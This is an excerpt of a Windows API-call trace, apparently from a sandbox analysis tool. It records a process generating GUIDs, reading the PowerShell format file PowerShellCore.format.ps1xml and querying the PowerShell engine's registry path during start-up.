	[0653.210] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x17687c77, Data2=0x5046, Data3=0x45a0, Data4=([0]=0x93, [1]=0xc8, [2]=0x1d, [3]=0xb7, [4]=0x2, [5]=0x1f, [6]=0x9c, [7]=0x64))) returned 0x0
	[0653.210] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x21af06f5, Data2=0x5b0a, Data3=0x464f, Data4=([0]=0x96, [1]=0xd, [2]=0x49, [3]=0x42, [4]=0xab, [5]=0x46, [6]=0x6d, [7]=0x79))) returned 0x0
	[0653.210] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xaca86c1b, Data2=0x170b, Data3=0x4c74, Data4=([0]=0x9e, [1]=0xdc, [2]=0x93, [3]=0x74, [4]=0xf3, [5]=0xb6, [6]=0xa3, [7]=0x4e))) returned 0x0
	[0653.210] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x718ebe3d, Data2=0xc67d, Data3=0x4ef7, Data4=([0]=0xaa, [1]=0x6b, [2]=0x85, [3]=0x5, [4]=0x6e, [5]=0x5a, [6]=0xff, [7]=0x1d))) returned 0x0
	[0653.210] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x3944849d, Data2=0xa5e3, Data3=0x4b8e, Data4=([0]=0x95, [1]=0x92, [2]=0x39, [3]=0x9e, [4]=0x23, [5]=0x1b, [6]=0xcc, [7]=0xc7))) returned 0x0
	[0653.211] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x41a53696, Data2=0xfa52, Data3=0x4c79, Data4=([0]=0xbf, [1]=0x2f, [2]=0x1d, [3]=0x0, [4]=0x85, [5]=0x4e, [6]=0x5c, [7]=0x17))) returned 0x0
	[0653.212] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xea5fbceb, Data2=0x4e8b, Data3=0x4d80, Data4=([0]=0x85, [1]=0xdd, [2]=0x10, [3]=0x68, [4]=0x70, [5]=0x71, [6]=0xb6, [7]=0xb3))) returned 0x0
	[0653.213] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xebd54dee, Data2=0xaef3, Data3=0x4995, Data4=([0]=0x91, [1]=0x69, [2]=0x38, [3]=0x79, [4]=0x96, [5]=0x14, [6]=0x93, [7]=0x6a))) returned 0x0
	[0653.213] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xbe625a3c, Data2=0x6e7a, Data3=0x4e81, Data4=([0]=0x94, [1]=0xd8, [2]=0x4b, [3]=0xb, [4]=0xba, [5]=0xf9, [6]=0xdf, [7]=0x5e))) returned 0x0
	[0653.214] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd84c623f, Data2=0x12dd, Data3=0x435b, Data4=([0]=0x84, [1]=0xf1, [2]=0x8f, [3]=0xb7, [4]=0xb1, [5]=0x1c, [6]=0xbc, [7]=0x91))) returned 0x0
	[0653.214] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x3cc88e9a, Data2=0x858d, Data3=0x410a, Data4=([0]=0x8d, [1]=0xe2, [2]=0x26, [3]=0xb1, [4]=0xff, [5]=0xbe, [6]=0x72, [7]=0x8a))) returned 0x0
	[0653.214] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x3749d61f, Data2=0x70a5, Data3=0x4269, Data4=([0]=0xaf, [1]=0xdf, [2]=0xe6, [3]=0xb3, [4]=0x6b, [5]=0x5d, [6]=0x7, [7]=0x7c))) returned 0x0
	[0653.214] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x52be0bf, Data2=0xc470, Data3=0x4ee0, Data4=([0]=0x8b, [1]=0x78, [2]=0x33, [3]=0xae, [4]=0xb9, [5]=0x7f, [6]=0xef, [7]=0x74))) returned 0x0
	[0653.214] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xedc62b16, Data2=0x711f, Data3=0x4025, Data4=([0]=0xa2, [1]=0xef, [2]=0x43, [3]=0xfc, [4]=0x92, [5]=0x29, [6]=0xc, [7]=0xbc))) returned 0x0
	[0653.215] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xccc202e1, Data2=0xb644, Data3=0x47c0, Data4=([0]=0x89, [1]=0x62, [2]=0xfa, [3]=0xdb, [4]=0xe4, [5]=0x41, [6]=0x57, [7]=0x8b))) returned 0x0
	[0653.215] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x92519a93, Data2=0xe242, Data3=0x4a27, Data4=([0]=0xa4, [1]=0xe7, [2]=0x24, [3]=0xf2, [4]=0xd6, [5]=0x94, [6]=0xc8, [7]=0xf2))) returned 0x0
	[0653.215] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0653.215] GetFileType (hFile=0x324) returned 0x1
	[0653.215] SetErrorMode (uMode=0x1) returned 0x1
	[0653.215] GetFileType (hFile=0x324) returned 0x1
	[0653.215] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0654.742] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.337] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.338] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.340] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.340] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.341] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.341] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.341] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.342] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.342] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.342] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.345] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.345] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.345] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.346] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0659.346] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0xe67, lpOverlapped=0x0) returned 1
	[0659.346] ReadFile (in: hFile=0x324, lpBuffer=0x31b97ef, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31b97ef*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0659.346] ReadFile (in: hFile=0x324, lpBuffer=0x31ba220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x31ba220*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0659.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0659.348] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0659.348] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0659.348] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0659.348] CoTaskMemFree (pv=0x1ba35c80) 
	[0659.348] RegCloseKey (hKey=0x324) returned 0x0
	[0659.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0659.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0659.350] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9507e336, Data2=0x3ef7, Data3=0x4526, Data4=([0]=0xa0, [1]=0x2b, [2]=0x58, [3]=0xd8, [4]=0x86, [5]=0x21, [6]=0xe7, [7]=0xc6))) returned 0x0
	[0659.351] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xdb975d8b, Data2=0x16a9, Data3=0x41c8, Data4=([0]=0x97, [1]=0x60, [2]=0xe0, [3]=0x8f, [4]=0x43, [5]=0xe3, [6]=0x47, [7]=0x22))) returned 0x0
	[0659.351] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x8159ed1d, Data2=0x7cdc, Data3=0x44b4, Data4=([0]=0xb5, [1]=0xb0, [2]=0x28, [3]=0x4c, [4]=0xc1, [5]=0xdd, [6]=0x42, [7]=0x51))) returned 0x0
	[0659.352] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb3c4e925, Data2=0xdfd1, Data3=0x4229, Data4=([0]=0xb9, [1]=0xff, [2]=0xe6, [3]=0x19, [4]=0x19, [5]=0x5e, [6]=0xf4, [7]=0x3a))) returned 0x0
	[0659.353] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x6bd9fc6f, Data2=0x7045, Data3=0x47fc, Data4=([0]=0x89, [1]=0x71, [2]=0x34, [3]=0x42, [4]=0xa0, [5]=0xb5, [6]=0x70, [7]=0x3a))) returned 0x0
	[0659.353] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc0faba39, Data2=0x3f09, Data3=0x4fcf, Data4=([0]=0xa9, [1]=0xcc, [2]=0x57, [3]=0x95, [4]=0xbf, [5]=0xfd, [6]=0x25, [7]=0x7))) returned 0x0
	[0659.354] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xa4c2045a, Data2=0x24a6, Data3=0x4925, Data4=([0]=0x9d, [1]=0xb7, [2]=0x94, [3]=0x5b, [4]=0x9b, [5]=0x63, [6]=0x8, [7]=0x2c))) returned 0x0
	[0659.354] VirtualQuery (in: lpAddress=0x26bca0, lpBuffer=0x26cb60, dwLength=0x30 | out: lpBuffer=0x26cb60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0659.356] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xfc7be834, Data2=0x974c, Data3=0x4765, Data4=([0]=0xb2, [1]=0x4d, [2]=0xe1, [3]=0xf9, [4]=0x80, [5]=0x6, [6]=0xb5, [7]=0xd6))) returned 0x0
	[0659.356] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x6da7eaf7, Data2=0x2cfa, Data3=0x4391, Data4=([0]=0x8a, [1]=0xef, [2]=0x40, [3]=0x6, [4]=0xbc, [5]=0xd5, [6]=0x92, [7]=0xb8))) returned 0x0
	[0659.357] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xcf437d8c, Data2=0xec6b, Data3=0x4a2a, Data4=([0]=0x9b, [1]=0x95, [2]=0xda, [3]=0xa8, [4]=0x42, [5]=0xa0, [6]=0xcc, [7]=0xd8))) returned 0x0
	[0659.357] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd6b6360, Data2=0x87e7, Data3=0x4f65, Data4=([0]=0x90, [1]=0x72, [2]=0x86, [3]=0x33, [4]=0x8b, [5]=0x5f, [6]=0x54, [7]=0x2c))) returned 0x0
	[0659.358] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf7e163c6, Data2=0xef93, Data3=0x44e4, Data4=([0]=0xa4, [1]=0xf4, [2]=0x6f, [3]=0xca, [4]=0xf8, [5]=0x7b, [6]=0x8a, [7]=0x9f))) returned 0x0
	[0659.358] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb2fa48df, Data2=0xef80, Data3=0x4d8e, Data4=([0]=0x86, [1]=0x5, [2]=0x34, [3]=0xb2, [4]=0x18, [5]=0xe5, [6]=0x61, [7]=0x6d))) returned 0x0
	[0659.358] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x56d54816, Data2=0x1d4d, Data3=0x403f, Data4=([0]=0xb5, [1]=0x76, [2]=0xfe, [3]=0x8e, [4]=0x16, [5]=0x7f, [6]=0x6d, [7]=0x8b))) returned 0x0
	[0659.358] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xcab69fb8, Data2=0x263a, Data3=0x493e, Data4=([0]=0x87, [1]=0x59, [2]=0x17, [3]=0xd7, [4]=0x69, [5]=0x9, [6]=0xb9, [7]=0x30))) returned 0x0
	[0659.358] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x5cc00561, Data2=0xced1, Data3=0x4efa, Data4=([0]=0x9c, [1]=0x66, [2]=0xf0, [3]=0x7f, [4]=0x8c, [5]=0xe, [6]=0x76, [7]=0x98))) returned 0x0
	[0659.359] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb39c3355, Data2=0x37b4, Data3=0x40df, Data4=([0]=0xa4, [1]=0xa7, [2]=0x77, [3]=0xac, [4]=0xee, [5]=0xdd, [6]=0xfd, [7]=0x5))) returned 0x0
	[0659.359] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc1cfde08, Data2=0xbbaf, Data3=0x47f2, Data4=([0]=0xb4, [1]=0x4d, [2]=0xc3, [3]=0xc6, [4]=0x97, [5]=0xf7, [6]=0xb6, [7]=0xe1))) returned 0x0
	[0659.359] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x95848147, Data2=0xdd21, Data3=0x4c5b, Data4=([0]=0xad, [1]=0x74, [2]=0x7d, [3]=0xe, [4]=0xa1, [5]=0x5a, [6]=0x25, [7]=0x3e))) returned 0x0
	[0659.359] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x202b86b1, Data2=0x71a5, Data3=0x4799, Data4=([0]=0xb3, [1]=0xa9, [2]=0x2d, [3]=0x20, [4]=0x90, [5]=0xff, [6]=0xd1, [7]=0xf1))) returned 0x0
	[0659.359] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xc12be9c, Data2=0x92a8, Data3=0x484a, Data4=([0]=0x87, [1]=0x10, [2]=0x36, [3]=0xe1, [4]=0xce, [5]=0x64, [6]=0xe2, [7]=0x8a))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x9614f433, Data2=0xd8d6, Data3=0x4500, Data4=([0]=0x9f, [1]=0x8e, [2]=0x3b, [3]=0xdb, [4]=0x3f, [5]=0xb7, [6]=0x26, [7]=0x7d))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb2832d76, Data2=0x6fe1, Data3=0x4125, Data4=([0]=0x8f, [1]=0xee, [2]=0xd6, [3]=0xaa, [4]=0x30, [5]=0xdd, [6]=0x70, [7]=0x2b))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x1986ebe7, Data2=0x9f46, Data3=0x4a40, Data4=([0]=0xa0, [1]=0x77, [2]=0x5b, [3]=0x4d, [4]=0x2f, [5]=0x7d, [6]=0x9f, [7]=0xd5))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x70105831, Data2=0x196b, Data3=0x4469, Data4=([0]=0x98, [1]=0xb3, [2]=0xb, [3]=0xba, [4]=0x1f, [5]=0x92, [6]=0xd5, [7]=0x22))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xab804c15, Data2=0x76cb, Data3=0x49af, Data4=([0]=0xa2, [1]=0x54, [2]=0x12, [3]=0x93, [4]=0x69, [5]=0x14, [6]=0x51, [7]=0xcf))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x14859ff, Data2=0x47c9, Data3=0x4498, Data4=([0]=0x82, [1]=0x7e, [2]=0x5a, [3]=0xa, [4]=0xdb, [5]=0xe6, [6]=0x4d, [7]=0x25))) returned 0x0
	[0659.360] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x17b9c016, Data2=0x2108, Data3=0x4b78, Data4=([0]=0xbe, [1]=0xd, [2]=0x84, [3]=0xc3, [4]=0x22, [5]=0x9f, [6]=0x37, [7]=0x26))) returned 0x0
	[0659.361] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x67f867b3, Data2=0xd58, Data3=0x4591, Data4=([0]=0xba, [1]=0xd8, [2]=0x9b, [3]=0xc, [4]=0x17, [5]=0xb6, [6]=0xf2, [7]=0x81))) returned 0x0
	[0659.361] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x8f9a0568, Data2=0xa8c1, Data3=0x4eef, Data4=([0]=0x91, [1]=0x62, [2]=0x5a, [3]=0x3f, [4]=0x5, [5]=0xc4, [6]=0xac, [7]=0xcb))) returned 0x0
	[0659.361] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2510679b, Data2=0x5422, Data3=0x4831, Data4=([0]=0x84, [1]=0x4b, [2]=0x18, [3]=0x9f, [4]=0xdb, [5]=0x5a, [6]=0x3d, [7]=0xae))) returned 0x0
	[0659.361] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x366f73b2, Data2=0xe957, Data3=0x4828, Data4=([0]=0xa4, [1]=0x4e, [2]=0x72, [3]=0x78, [4]=0x3c, [5]=0xa7, [6]=0x62, [7]=0xd9))) returned 0x0
	[0659.361] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x8e4c3cfa, Data2=0xf7b4, Data3=0x49c2, Data4=([0]=0x99, [1]=0x1a, [2]=0xf9, [3]=0x27, [4]=0x53, [5]=0xa1, [6]=0xe4, [7]=0xbd))) returned 0x0
	[0659.362] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x2685a675, Data2=0x9fc6, Data3=0x4863, Data4=([0]=0x81, [1]=0x98, [2]=0x6f, [3]=0x6, [4]=0x78, [5]=0xf8, [6]=0x25, [7]=0x80))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x55b01aa2, Data2=0x3561, Data3=0x4509, Data4=([0]=0x83, [1]=0x14, [2]=0x8f, [3]=0x5e, [4]=0x32, [5]=0x18, [6]=0xc8, [7]=0xef))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xf83e1aae, Data2=0x38af, Data3=0x4280, Data4=([0]=0xa5, [1]=0xe8, [2]=0xa5, [3]=0xb0, [4]=0x33, [5]=0x3a, [6]=0xc4, [7]=0x53))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x1e557609, Data2=0x57a3, Data3=0x4ff7, Data4=([0]=0xb4, [1]=0x6, [2]=0xed, [3]=0xab, [4]=0xdb, [5]=0x1d, [6]=0x2e, [7]=0xa9))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x4aef1a18, Data2=0x3563, Data3=0x45b5, Data4=([0]=0x9b, [1]=0x87, [2]=0x23, [3]=0x93, [4]=0xa1, [5]=0x5c, [6]=0x7f, [7]=0xf9))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xdb01fbbf, Data2=0x9a8b, Data3=0x4660, Data4=([0]=0xb2, [1]=0xe, [2]=0x7, [3]=0x8a, [4]=0x2f, [5]=0xe, [6]=0xc4, [7]=0xfb))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd8257ed3, Data2=0x17bd, Data3=0x43b7, Data4=([0]=0x86, [1]=0x8d, [2]=0x4f, [3]=0x56, [4]=0x6a, [5]=0xae, [6]=0xa7, [7]=0xd9))) returned 0x0
	[0659.363] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x65f5500c, Data2=0xcc72, Data3=0x4bcc, Data4=([0]=0xb3, [1]=0xd, [2]=0xe3, [3]=0xd, [4]=0x59, [5]=0x94, [6]=0x15, [7]=0x5a))) returned 0x0
	[0659.375] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xb5bdc3e2, Data2=0xb33e, Data3=0x4b6c, Data4=([0]=0xbf, [1]=0x73, [2]=0x7c, [3]=0x15, [4]=0xfe, [5]=0xcc, [6]=0x6, [7]=0x87))) returned 0x0
	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x7b779e8b, Data2=0x216d, Data3=0x47db, Data4=([0]=0x8a, [1]=0x48, [2]=0xca, [3]=0x7c, [4]=0xd1, [5]=0x40, [6]=0x3c, [7]=0x2c))) returned 0x0
	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd2c83183, Data2=0x288b, Data3=0x4276, Data4=([0]=0x92, [1]=0xbc, [2]=0x88, [3]=0x20, [4]=0x8f, [5]=0xfb, [6]=0xcd, [7]=0xe2))) returned 0x0
	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xbb00fe5d, Data2=0xfb29, Data3=0x49e8, Data4=([0]=0x99, [1]=0xce, [2]=0x1, [3]=0x9e, [4]=0x47, [5]=0x4e, [6]=0xe2, [7]=0xeb))) returned 0x0
	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x5726d8f9, Data2=0xc97b, Data3=0x488a, Data4=([0]=0x80, [1]=0xb2, [2]=0xe4, [3]=0x44, [4]=0xe2, [5]=0x1a, [6]=0x6c, [7]=0xd))) returned 0x0
	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x19df06f7, Data2=0x2d16, Data3=0x4c6b, Data4=([0]=0xad, [1]=0x4b, [2]=0x50, [3]=0xa1, [4]=0x34, [5]=0x3, [6]=0x40, [7]=0xe9))) returned 0x0
